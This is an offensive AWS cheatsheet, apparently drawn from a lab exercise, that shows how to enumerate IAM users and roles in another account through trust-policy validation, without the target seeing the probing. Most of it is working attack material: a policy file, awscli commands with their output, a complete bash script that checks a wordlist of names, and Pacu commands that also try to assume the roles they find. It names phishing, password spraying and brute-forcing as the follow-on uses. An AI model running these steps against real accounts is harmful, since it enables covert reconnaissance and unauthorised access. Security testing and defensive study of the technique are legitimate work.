Cheatsheet - AWS - Scenario - Unauthenticated IAM principal enumeration - IAM role trust policy
Overview
Utilise IAM role trust policies to enumerate IAM users and roles in another AWS account without authenticating to that account.
Service/Tool: Pacu, IAM, awscli
Use Case: Discover IAM principals in another AWS account that can be used for further attacks such as phishing, password spraying or brute-forcing.
Prerequisites: the 12-digit AWS account ID of the target; an AWS account under our control, with credentials that can call iam:UpdateAssumeRolePolicy on a role in that account.
Attack Workflow
1. Step 1 (Discovery/Access) - Manual
Objective: Use Trust Policy to enumerate IAM principals in another AWS account.
Command/Method:
A Trust Policy (the role's assume role policy document) defines which principals are allowed to assume a role; what the role can do once assumed is set separately in its permissions policies. AWS allows administrators to grant access to roles within their account to principals residing in another account (i.e. cross-account access).
This can be exploited because IAM validates every principal ARN in a Trust Policy before it will save the policy: an ARN that names a user or role which does not exist in the referenced account is rejected. The user or role name portion of the ARN can therefore be guessed from a list of common names in order to gain insight into another account's principals. The validation happens entirely within our own account, so the target account receives no API call and no CloudTrail event.
To carry this out we create the following file, policy.json:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "EnumRoles",
            "Effect": "Deny",
            "Action": "sts:AssumeRole",
            "Principal": {
                "AWS": "arn:aws:iam::104506445608:role/admin"
            }
        }
    ]
}
If the role admin does not exist in account ID 104506445608, AWS will not allow us to save this policy and returns an error stating that the specified principal ARN does not exist.
Next, using valid credentials within our own AWS account, where a role named IAMEnum already exists (its Trust Policy is overwritten by each attempt), we run the following:
aws iam update-assume-role-policy --role-name IAMEnum --policy-document file://policy.json
An error occurred (MalformedPolicyDocument) when calling the UpdateAssumeRolePolicy operation: Invalid principal in policy: "AWS":"arn:aws:iam::104506445608:role/admin"
In this example the call fails, which indicates that there is no role named admin in the target account. If we update the Trust Policy with a valid principal instead, the call returns no output and no error. Because the statement's effect is Deny, a valid principal gains no access from it, but the role's Trust Policy should still be restored or the role deleted once enumeration is finished.
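The manual check above scales to a wordlist with a short shell script. The script below is an added example, not part of the original cheatsheet or of Pacu: it builds the Deny-only trust policy for each candidate name, submits it with update-assume-role-policy against a role in our own account, and classifies the response. It assumes the awscli is configured with credentials for the attacking account and that the role given as the fourth argument (default IAMEnum, a name assumed here) already exists there; the wordlist format (one name per line) and the 0.2 s delay are also assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): enumerate IAM users or roles in a
# target account by validating candidate principal ARNs through the trust
# policy of a role in OUR account. Assumes awscli credentials for the attacking
# account and an existing local role (default "IAMEnum", an assumed name).
set -u

# Build a trust policy document naming a single candidate principal.
# $1 = target account ID, $2 = principal type ("user" or "role"), $3 = name.
# Effect is Deny, so even a valid principal gains nothing from this policy.
build_policy() {
  local account="$1" ptype="$2" name="$3"
  printf '{"Version":"2012-10-17","Statement":[{"Sid":"Enum","Effect":"Deny","Action":"sts:AssumeRole","Principal":{"AWS":"arn:aws:iam::%s:%s/%s"}}]}' \
    "$account" "$ptype" "$name"
}

# Classify the stderr text produced by update-assume-role-policy.
# Prints "exists" when the call succeeded (no output at all), "missing" when IAM
# rejected the principal ARN, and "error" for anything else (throttling, bad
# credentials, nonexistent local role ...) so noise is not mistaken for a hit.
classify() {
  local output="$1"
  if [ -z "$output" ]; then
    echo exists
  elif printf '%s' "$output" | grep -q 'Invalid principal in policy'; then
    echo missing
  else
    echo error
  fi
}

# Try one candidate: returns 0 only if the principal exists in the target account.
# stderr is captured (the error text is the signal); stdout is discarded.
probe() {
  local account="$1" ptype="$2" name="$3" role="$4" out
  out=$(aws iam update-assume-role-policy --role-name "$role" \
          --policy-document "$(build_policy "$account" "$ptype" "$name")" 2>&1 >/dev/null) || true
  [ "$(classify "$out")" = exists ]
}

# usage: ./iam_enum.sh <target-account-id> <user|role> <wordlist> [local-role]
# Each probe rewrites the local role's trust policy; restore it afterwards.
main() {
  local account="$1" ptype="$2" wordlist="$3" role="${4:-IAMEnum}" name
  while IFS= read -r name; do
    [ -z "$name" ] && continue
    if probe "$account" "$ptype" "$name" "$role"; then
      echo "[+] arn:aws:iam::${account}:${ptype}/${name}"
    fi
    sleep 0.2   # IAM write calls are throttled; pace the loop
  done < "$wordlist"
}

if [ "$#" -ge 3 ]; then main "$@"; fi
```

Only the "exists" classification is reported as a hit; a NoSuchEntity error for the local role or a throttling error is deliberately not treated as either outcome, which is the most common source of false positives when scripting this check.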
2. Step 2 (Discovery/Access) - Automated
Objective: Use Pacu to enumerate IAM principals in another AWS account via Trust Policies.
Command/Method:
As an automated alternative we can use Pacu, which runs the same Trust Policy check against a wordlist of names. Its role enumeration module will also attempt to assume any roles it discovers and, where a role's Trust Policy permits it, provide us with temporary credentials.
Pacu can be found at the following URL: https://github.com/RhinoSecurityLabs/pacu
After installing, configure our AWS keys with set_keys, then execute the following command (the role IAMEnum must already exist in our own account; Pacu overwrites its Trust Policy on every attempt):
run iam__enum_users --role-name IAMEnum --account-id 104506445608
This can take some time to run. It prints the users it has been able to enumerate:
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/Bryan
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/Cloud9
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/CloudWatch
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/DatabaseAdministrator
[iam__enum_users] Found user: arn:aws:iam::104506445608:user/DynamoDB
We can run a similar command to enumerate roles. This command will also attempt to assume any role it finds:
run iam__enum_roles --role-name IAMEnum --account-id 104506445608
Again, this can take some time to run. It lists the roles it has been able to enumerate plus any it was able to assume from our account without further authentication:
[iam__enum_roles] Starting role enumeration...
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/APIGateway
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/Administrator
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/AutoScaling
[iam__enum_roles] Found role: arn:aws:iam::104506445608:role/DatadogAWSIntegrationRole
Notes and References
Links:
PwnedLabs - Unauthenticated AWS IAM Principals Enumeration